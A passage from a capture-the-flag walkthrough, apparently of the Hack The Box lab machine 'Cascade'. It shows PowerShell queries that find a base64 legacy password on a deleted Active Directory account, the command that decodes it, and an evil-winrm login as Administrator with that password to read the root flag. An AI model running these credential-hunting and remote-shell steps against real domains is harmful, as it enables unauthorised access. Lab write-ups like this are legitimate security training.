CASCADE\Remote Management Users Alias S-1-5-21-3332504370-1206983947-1165150453-1126 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Plus Mandatory Level Label S-1-16-8448
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
A password found in the attributes of a deleted object
- YmFDVDNyMWFOMDBkbGVz
*Evil-WinRM* PS C:\Users\arksvc\Documents> Get-ADObject -filter 'isDeleted -eq $true' -includeDeletedObjects -Properties *
<SNIP>
CN : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
Created : 1/26/2020 2:34:31 AM
createTimeStamp : 1/26/2020 2:34:31 AM
Deleted : True
Description :
DisplayName :
DistinguishedName : CN=User\0ADEL:746385f2-e3a0-4252-b83a-5a206da0ed88,CN=Deleted Objects,DC=cascade,DC=local
dSCorePropagationData : {1/1/1601 12:00:00 AM}
instanceType : 4
isDeleted : True
LastKnownParent : CN={A403B701-A528-4685-A816-FDEE32BDDCBA}\0ADEL:ff5c2fdc-cc11-44e3-ae4c-071aab2ccc6e,CN=Deleted Objects,DC=cascade,DC=local
Modified : 1/26/2020 2:40:52 AM
modifyTimeStamp : 1/26/2020 2:40:52 AM
msDS-LastKnownRDN : User
Name : User
DEL:746385f2-e3a0-4252-b83a-5a206da0ed88
nTSecurityDescriptor : System.DirectoryServices.ActiveDirectorySecurity
ObjectCategory :
ObjectClass : container
ObjectGUID : 746385f2-e3a0-4252-b83a-5a206da0ed88
ProtectedFromAccidentalDeletion : False
sDRightsEffective : 0
showInAdvancedViewOnly : True
uSNChanged : 196700
uSNCreated : 196690
whenChanged : 1/26/2020 2:40:52 AM
whenCreated : 1/26/2020 2:34:31 AM
accountExpires : 9223372036854775807
badPasswordTime : 0
badPwdCount : 0
CanonicalName : cascade.local/Deleted Objects/TempAdmin
DEL:f0cc344d-31e0-4866-bceb-a842791ca059
cascadeLegacyPwd : YmFDVDNyMWFOMDBkbGVz
<SNIP>
Base64-decoding the value
┌──(kali㉿kali)-[~/Cascade]
└─$ echo -n 'YmFDVDNyMWFOMDBkbGVz' | base64 -d
baCT3r1aN00dles
Connecting via WinRM as Administrator with the recovered password
┌──(kali㉿kali)-[~/Cascade]
└─$ evil-winrm -i cascade.local -u 'administrator' -p 'baCT3r1aN00dles'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
293d219c70dfd7c5c6eef11d11ecbd50
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection 4:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::9079:58d1:e378:4e86
Link-local IPv6 Address . . . . . : fe80::9079:58d1:e378:4e86%15
IPv4 Address. . . . . . . . . . . : 10.129.2.120
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%15
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb